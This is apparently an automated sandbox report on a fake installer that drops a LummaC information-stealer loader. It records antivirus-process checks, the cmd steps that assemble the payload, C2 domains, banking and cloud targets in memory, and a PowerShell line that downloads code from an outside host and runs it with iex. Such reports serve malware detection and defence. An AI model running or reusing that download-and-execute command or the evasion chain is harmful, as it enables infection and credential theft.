Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\709182\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696584680t
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
Source: Lightweight.com, 00000017.00000002.2304957335.0000000000F35000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696584680]
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696584680x
Source: TCCTL32.DLL.10.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696584680s
Source: Lightweight.com, 00000017.00000002.2309158308.0000000003CBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696584680\|UE
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696584680x
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696584680u
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696584680}
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 0000001C.00000002.2168777197.000000000895C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696584680x
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696584680t
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696584680
Source: powershell.exe, 0000001E.00000002.2321451025.0000000005272000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LLVMX86_FP80TypeKind
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696584680}
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696584680h
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003D04000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696584680p
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
Source: Lightweight.com, 00000017.00000002.2309158308.0000000003CBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: invalid PARAM usage_mesa_symbol_table_push_scope_mesa_symbol_table_add_global_symbol_mesa_symbol_table_add_symbolARB_ARB_position_invariantexpfog_linearexp2nicestprecision_hint_draw_buffersfastestfragment_coord_fragment_program_shadowpixel_center_integerorigin_upper_leftATI_fatal flex scanner internal error--no action foundfatal error - scanner input buffer overflowfatal flex scanner internal error--end of buffer missedout of dynamic memory in yy_get_next_buffer()input in flex scanner failedout of dynamic memory in _mesa_program_lexer__create_buffer()flex scanner push-back overflowout of dynamic memory in _mesa_program_lexer__scan_buffer()out of dynamic memory in _mesa_program_lexer_ensure_buffer_stack()bad buffer in _mesa_program_lexer__scan_bytes()out of dynamic memory in _mesa_program_lexer__scan_bytes()_mesa_program_lexer_set_column called with no buffer_mesa_program_lexer_set_lineno called with no bufferVMware, Inc.SOFTPIPE_USE_LLVMUnexpected PIPE_CAP %d query
Source: TCCTL32.DLL.10.dr	Binary or memory string: VMWare
Source: lang-1058.dll.10.dr	Binary or memory string: VMware Horizon Client
Source: 7zG.exe, 0000000A.00000003.1473463761.000001BFD1680000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: t2t1dst0t3dst2dst1dst3LLVMVoidTypeKindLLVMDoubleTypeKindLLVMFloatTypeKindLLVMFP128TypeKindLLVMX86_FP80TypeKindLLVMLabelTypeKindLLVMPPC_FP128TypeKindLLVMFunctionTypeKindLLVMIntegerTypeKindLLVMArrayTypeKindLLVMStructTypeKindLLVMVectorTypeKindLLVMPointerTypeKindunknown LLVMTypeKindLLVMMetadataTypeKindVector [%u] of %s
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696584680o
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696584680f
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696584680
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696584680j
Source: Lightweight.com, 00000017.00000003.1927551367.0000000003CFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696584680d
Source: lang-1058.dll.10.dr	Binary or memory string: VMware Player

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Lightweight.com, 00000017.00000003.1840925208.0000000003BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: Lightweight.com, 00000017.00000003.1842772510.0000000003C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: laborersquei.click

Source: C:\Users\user\Desktop\installer_1.05_36.4\installer_1.05_36.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Expected Expected.cmd & Expected.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 709182	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Bet	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "brandon" M	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Effective + ..\Certificates + ..\Stones + ..\Harder + ..\Planners + ..\Suppose N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com Lightweight.com N	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: Lightweight.com, 00000017.00000000.1571844510.0000000000AD3000.00000002.00000001.01000000.00000009.sdmp, Lightweight.com, 00000017.00000003.1850647478.0000000004123000.00000004.00000800.00020000.00000000.sdmp, Organization.20.dr, Lightweight.com.13.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\Read me before you start.txt VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
